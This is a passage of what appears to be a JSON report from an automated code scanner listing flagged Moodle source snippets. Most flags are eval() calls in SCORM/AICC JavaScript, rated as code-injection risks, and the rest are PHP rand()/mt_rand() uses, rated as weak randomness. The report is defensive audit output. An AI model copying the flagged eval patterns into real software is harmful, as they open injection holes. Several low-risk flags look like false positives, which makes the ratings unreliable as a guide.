"moodle/mod/scorm/datamodels/scorm_13.js", "code": " var interactiontype = eval(String(parentelement).replace('correct_responses','type'));\n var interactioncount = eval(parentelement + '._count');\n // trap duplicate values, which is not allowed for type choice\n if (interactiontype == 'choice') {\n for (var i = 0; (i < interactioncount) && (errorCode == \"0\"); i++) {\n if (eval(parentelement + '.N' + i + '.pattern') == value) {\n errorCode = \"351\";\n }\n }\n }\n if ((typeof correct_responses[interactiontype].limit == 'undefined') ||\n", "vulnerId": "APPCUT:62:14401", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 71, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 583, "positionInEndLine": 111, "startLineNumber": 583, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-datasource/yui2-datasource-debug.js", "code": " var objEnd = Math.max(oFullResponse.lastIndexOf(\"]\"),oFullResponse.lastIndexOf(\"}\"));\n oFullResponse = oFullResponse.substring(0,objEnd+1);\n \n // Turn the string into an object literal...\n // ...eval is necessary here\n oFullResponse = eval(\"(\" + oFullResponse + \")\");\n \n }\n }\n }\n }\n", "vulnerId": "APPCUT:62:14392", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1137, "positionInEndLine": 75, "startLineNumber": 1137, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " break;\n case 'cmi.interactions.n.correct_responses.n.pattern':\n if (typeof eval(parentelement) != \"undefined\") {\n // Use cmi.interactions.n.type value to check the right dataelement format\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n var interactiontype = eval(String(parentelement).replace('correct_responses','type'));\n var interactioncount = eval(parentelement + '._count');\n // trap duplicate values, which is not allowed for type choice\n if (interactiontype == 'choice') {\n for (var i = 0; (i < interactioncount) && (errorCode == \"0\"); i++) {\n if (eval(parentelement + '.N' + i + '.pattern') == value) {\n", "vulnerId": "APPCUT:62:14400", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 82, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 578, "positionInEndLine": 141, "startLineNumber": 578, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " // Store data.\n if (errorCode == \"0\") {\n if (autocommit && !(AICCapi.timeout)) {\n AICCapi.timeout = Y.later(60000, API, 'LMSCommit', [\"\"], false);\n }\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range')) != \"undefined\") {\n range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if ((value >= ranges[0]) && (value <= ranges[1])) {\n eval(element + '=\"' + value + '\";');\n", "vulnerId": "APPCUT:62:14391", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 342, "positionInEndLine": 108, "startLineNumber": 342, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " var myRequest = NewHttpReq();\n result = DoRequest(myRequest, datamodelurl, datamodelurlparams + datastring);\n\n var results = String(result).split('\\n');\n if ((results.length > 2) && (navrequest != '')) {\n eval(results[2]);\n }\n errorCode = results[1];\n return results[0];\n }\n\n", "vulnerId": "APPCUT:62:14406", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 16, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1233, "positionInEndLine": 28, "startLineNumber": 1233, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " nav = new Object();\n\n for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n }\n", "vulnerId": "APPCUT:62:14399", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 24, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 151, "positionInEndLine": 100, "startLineNumber": 151, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " var expression = new RegExp(CMIIndexStore,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n var elementstring = '&' + underscore(element) + '=' + encodeURIComponent(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property] || eval('typeof(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue)') != typeof(data[property])) {\n datastring += elementstring;\n }\n } else {\n datastring += elementstring;\n", "vulnerId": "APPCUT:62:14393", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1186, "positionInEndLine": 107, "startLineNumber": 1186, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " break;\n case 'cmi.interactions.n.objectives.n.id':\n if (typeof eval(parentelement) != \"undefined\") {\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n }\n } else {\n errorCode = \"351\";\n diagnostic = \"Data Model Element ID Already Exists\";\n", "vulnerId": "APPCUT:62:14388", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 64, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 563, "positionInEndLine": 94, "startLineNumber": 563, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-profiler/yui2-profiler.js", "code": " * @static\n */\n registerObject : function (name /*:String*/, object /*:Object*/, recurse /*:Boolean*/) /*:Void*/{\n \n //get the object\n object = (lang.isObject(object) ? object : eval(name));\n \n //save the object\n container[name] = object;\n \n for (var prop in object) {\n", "vulnerId": "APPCUT:62:14402", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 59, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 454, "positionInEndLine": 65, "startLineNumber": 454, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if (errorCode == \"0\") {\n if (autocommit && !(SCORMapi1_3.timeout)) {\n SCORMapi1_3.timeout = Y.later(60000, API_1484_11, 'Commit', [\"\"], false);\n }\n\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range')) != \"undefined\") {\n range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if (value >= ranges[0]) {\n if ((ranges[1] == '*') || (value <= ranges[1])) {\n", "vulnerId": "APPCUT:62:14405", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 752, "positionInEndLine": 108, "startLineNumber": 752, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n errorCode = \"201\"\n }\n } else {\n", "vulnerId": "APPCUT:62:14389", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 367, "positionInEndLine": 105, "startLineNumber": 367, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " //Store data\n if (errorCode == \"0\") {\n if (autocommit && !(SCORMapi1_2.timeout)) {\n SCORMapi1_2.timeout = Y.later(60000, API, 'LMSCommit', [\"\"], false);\n }\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range')) != \"undefined\") {\n range = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].range');\n ranges = range.split('#');\n value = value * 1.0;\n if ((value >= ranges[0]) && (value <= ranges[1])) {\n eval(element + '=value;');\n", "vulnerId": "APPCUT:62:14394", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 359, "positionInEndLine": 108, "startLineNumber": 359, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (elementIndexes[i + 1].match(/^\\d+$/)) {\n if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n if (elementIndexes[i + 1] > eval(subelement + '.' + elementIndex + '._count')) {\n errorCode = \"201\";\n }\n", "vulnerId": "APPCUT:62:14398", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 73, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 324, "positionInEndLine": 118, "startLineNumber": 324, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n var elementstring = '&' + underscore(element) + '=' + encodeURIComponent(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property] || eval('typeof(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue)') != typeof(data[property])) {\n datastring += elementstring;\n }\n } else {\n datastring += elementstring;\n }\n", "vulnerId": "APPCUT:62:14390", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 36, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1187, "positionInEndLine": 104, "startLineNumber": 1187, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 17, "vulnerabilities": [{"sourceFileName": "moodle/admin/tool/generator/classes/course_backend.php", "code": " * @return int A section number from 1 to the number of sections\n */\n private function get_target_section() {\n\n if (!$this->fixeddataset) {\n $key = rand(1, self::$paramsections[$this->size]);\n } else {\n // Using section 1.\n $key = 1;\n }\n\n", "vulnerId": "APPCUT:62:14489", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 19, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 568, "positionInEndLine": 61, "startLineNumber": 568, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/admin/tool/generator/classes/course_backend.php", "code": " // Use last digits of data.\n return substr($data, -$length);\n }\n $length -= strlen($data);\n for ($j = 0; $j < $length; $j++) {\n $data .= chr(rand(1, 255));\n }\n return $data;\n }\n\n /**\n", "vulnerId": "APPCUT:62:14495", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 25, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 463, "positionInEndLine": 37, "startLineNumber": 463, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/filelib.php", "code": " $contextid = context_user::instance($USER->id)->id;\n\n $fs = get_file_storage();\n $draftitemid = rand(1, 999999999);\n while ($files = $fs->get_area_files($contextid, 'user', 'draft', $draftitemid)) {\n $draftitemid = rand(1, 999999999);\n }\n\n return $draftitemid;\n}\n\n", "vulnerId": "APPCUT:62:14445", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 23, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 356, "positionInEndLine": 41, "startLineNumber": 356, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/backup/cc/cc_lib/cc_utils.php", "code": " * @param string $prefix\n * @param string $suffix\n * @return string\n */\n public static function uuidgen($prefix = '', $suffix = '', $uppercase = true) {\n $uuid = trim(sprintf('%s%04x%04x%s', $prefix, mt_rand(0, 65535), mt_rand(0, 65535), $suffix));\n $result = $uppercase ? strtoupper($uuid) : strtolower($uuid);\n return $result;\n }\n\n /**\n", "vulnerId": "APPCUT:62:14456", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 54, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 51, "positionInEndLine": 71, "startLineNumber": 51, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/backup/cc/cc_lib/cc_organization.php", "code": " $this->sequencing = null;\n\n }\n\n public function uuidgen() {\n $uuid = sprintf('%04x%04x', mt_rand(0, 65535), mt_rand(0, 65535));\n return strtoupper(trim($uuid));\n }\n\n\n}\n", "vulnerId": "APPCUT:62:14454", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 36, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 119, "positionInEndLine": 53, "startLineNumber": 119, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/bennu/bennu.class.php", "code": " static function generate_guid() {\n // Implemented as per the Network Working Group draft on UUIDs and GUIDs\n\n // These two octets get special treatment\n $time_hi_and_version = sprintf('%02x', (1 << 6) + mt_rand(0, 15)); // 0100 plus 4 random bits\n $clock_seq_hi_and_reserved = sprintf('%02x', (1 << 7) + mt_rand(0, 63)); // 10 plus 6 random bits\n\n // Need another 14 random octects\n $pool = '';\n for($i = 0; $i < 7; ++$i) {\n $pool .= sprintf('%04x', mt_rand(0, 65535));\n", "vulnerId": "APPCUT:62:14492", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 64, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 35, "positionInEndLine": 78, "startLineNumber": 35, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/admin/tool/uploaduser/picture.php", "code": " if (substr($dir, -1) != '/') {\n $dir .= '/';\n }\n\n do {\n $path = $dir.$prefix.mt_rand(0, 9999999);\n } while (file_exists($path));\n\n check_dir_exists($path);\n\n return $path;\n", "vulnerId": "APPCUT:62:14477", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 29, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 135, "positionInEndLine": 48, "startLineNumber": 135, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/backup/cc/cc_lib/cc_utils.php", "code": " * @param string $prefix\n * @param string $suffix\n * @return string\n */\n public static function uuidgen($prefix = '', $suffix = '', $uppercase = true) {\n $uuid = trim(sprintf('%s%04x%04x%s', $prefix, mt_rand(0, 65535), mt_rand(0, 65535), $suffix));\n $result = $uppercase ? strtoupper($uuid) : strtolower($uuid);\n return $result;\n }\n\n /**\n", "vulnerId": "APPCUT:62:14455", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 73, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 51, "positionInEndLine": 90, "startLineNumber": 51, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/moodlelib.php", "code": " if (empty($CFG->passwordpolicy)) {\n $fillers = PASSWORD_DIGITS;\n $wordlist = file($CFG->wordlist);\n $word1 = trim($wordlist[rand(0, count($wordlist) - 1)]);\n $word2 = trim($wordlist[rand(0, count($wordlist) - 1)]);\n $filler1 = $fillers[rand(0, strlen($fillers) - 1)];\n $password = $word1 . $filler1 . $word2;\n } else {\n $minlen = !empty($CFG->minpasswordlength) ? $CFG->minpasswordlength : 0;\n $digits = $CFG->minpassworddigits;\n $lower = $CFG->minpasswordlower;\n", "vulnerId": "APPCUT:62:14493", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 28, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 7996, "positionInEndLine": 57, "startLineNumber": 7996, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/mod/feedback/item/captcha/print_captcha.php", "code": " imagefilledellipse($image, $propobj->x, $propobj->y, $elipsesize, $elipsesize, $col_ellipse);\n}\n\n$checkchar = '';\nfor ($i = 0; $i < $charcount; $i++) {\n $colnum = rand(1, 2);\n $textcol = new stdClass();\n $textcol->red = get_random_color(${'col_text'.$colnum}[0], ${'col_text'.$colnum}[1]);\n $textcol->green = get_random_color(${'col_text'.$colnum}[0], ${'col_text'.$colnum}[1]);\n $textcol->blue = get_random_color(${'col_text'.$colnum}[0], ${'col_text'.$colnum}[1]);\n $color_text = imagecolorallocate($image, $textcol->red, $textcol->green, $textcol->blue);\n", "vulnerId": "APPCUT:62:14481", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 14, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 100, "positionInEndLine": 24, "startLineNumber": 100, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/password_compat/lib/password.php", "code": " $bl = PasswordCompat\\binary\\_strlen($buffer);\n for ($i = 0; $i < $raw_salt_len; $i++) {\n if ($i < $bl) {\n $buffer[$i] = $buffer[$i] ^ chr(mt_rand(0, 255));\n } else {\n $buffer .= chr(mt_rand(0, 255));\n }\n }\n }\n $salt = $buffer;\n $salt_requires_encoding = true;\n", "vulnerId": "APPCUT:62:14464", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 43, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 134, "positionInEndLine": 58, "startLineNumber": 134, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/admin/tool/generator/classes/course_backend.php", "code": " * @return int A user id for a random created user\n */\n private function get_target_user() {\n\n if (!$this->fixeddataset) {\n $userid = $this->userids[rand(1, self::$paramusers[$this->size])];\n } else if ($userid = current($this->userids)) {\n // Moving pointer to the next user.\n next($this->userids);\n } else {\n // Returning to the beginning if we reached the end.\n", "vulnerId": "APPCUT:62:14491", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 37, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 587, "positionInEndLine": 76, "startLineNumber": 587, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/moodlelib.php", "code": " global $CFG;\n\n if (empty($CFG->passwordpolicy)) {\n $fillers = PASSWORD_DIGITS;\n $wordlist = file($CFG->wordlist);\n $word1 = trim($wordlist[rand(0, count($wordlist) - 1)]);\n $word2 = trim($wordlist[rand(0, count($wordlist) - 1)]);\n $filler1 = $fillers[rand(0, strlen($fillers) - 1)];\n $password = $word1 . $filler1 . $word2;\n } else {\n $minlen = !empty($CFG->minpasswordlength) ? $CFG->minpasswordlength : 0;\n", "vulnerId": "APPCUT:62:14479", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 32, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 7994, "positionInEndLine": 61, "startLineNumber": 7994, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/admin/tool/messageinbound/classes/manager.php", "code": "\n if (!empty($CFG->antiviruses)) {\n mtrace(\"--> Attempting virus scan of '{$attachment->filename}'\");\n\n // Store the file on disk - it will need to be virus scanned first.\n $itemid = rand(1, 999999999);;\n $directory = make_temp_directory(\"/messageinbound/{$itemid}\", false);\n $filepath = $directory . \"/\" . $attachment->filename;\n if (!$fp = fopen($filepath, \"w\")) {\n // Unable to open the temporary file to write this to disk.\n mtrace(\"--> Unable to save the file to disk for virus scanning. Check file permissions.\");\n", "vulnerId": "APPCUT:62:14463", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 22, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 664, "positionInEndLine": 40, "startLineNumber": 664, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}, {"sourceFileName": "moodle/lib/filelib.php", "code": " }\n\n $contextid = context_user::instance($USER->id)->id;\n\n $fs = get_file_storage();\n $draftitemid = rand(1, 999999999);\n while ($files = $fs->get_area_files($contextid, 'user', 'draft', $draftitemid)) {\n $draftitemid = rand(1, 999999999);\n }\n\n return $draftitemid;\n", "vulnerId": "APPCUT:62:14478", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/CryptoInsufficientRandomValues.html", "positionInStartLine": 19, "patternDescription": "Standard static pseudorandom number generators are very easily predictable, which lower the cryptographic defense of the application.", "appercutVulnerName": "Using Insufficiently Random Generators in Cryptography", "endLineNumber": 354, "positionInEndLine": 37, "startLineNumber": 354, "patternCodeLanguage": "PHP", "appercutRisk": "LOW"}]}, {"pageNumber": 9, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " // ignore the session time element\n if (element != \"cmi.core.session_time\") {\n\n // check if this specific element is not defined in the datamodel,\n // but the generic element name is\n if ((eval('typeof datamodel[\"' + scoid + '\"][\"' + element + '\"]')) == \"undefined\"\n && (eval('typeof datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n\n // add this specific element to the data model (by cloning\n // the generic element) so we can track changes to it\n eval('datamodel[\"' + scoid + '\"][\"' + element + '\"]=CloneObj(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]);');\n", "vulnerId": "APPCUT:62:14357", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 29, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 560, "positionInEndLine": 85, "startLineNumber": 560, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": "\n function duplicatedPA (element, parent, value) {\n var found = false;\n var elements = eval(parent + '._count');\n for (var n = 0; (n < elements) && (!found); n++) {\n if ((parent + '.N' + n + '.pattern' != element) && (eval(parent + '.N' + n + '.pattern') == value)) {\n 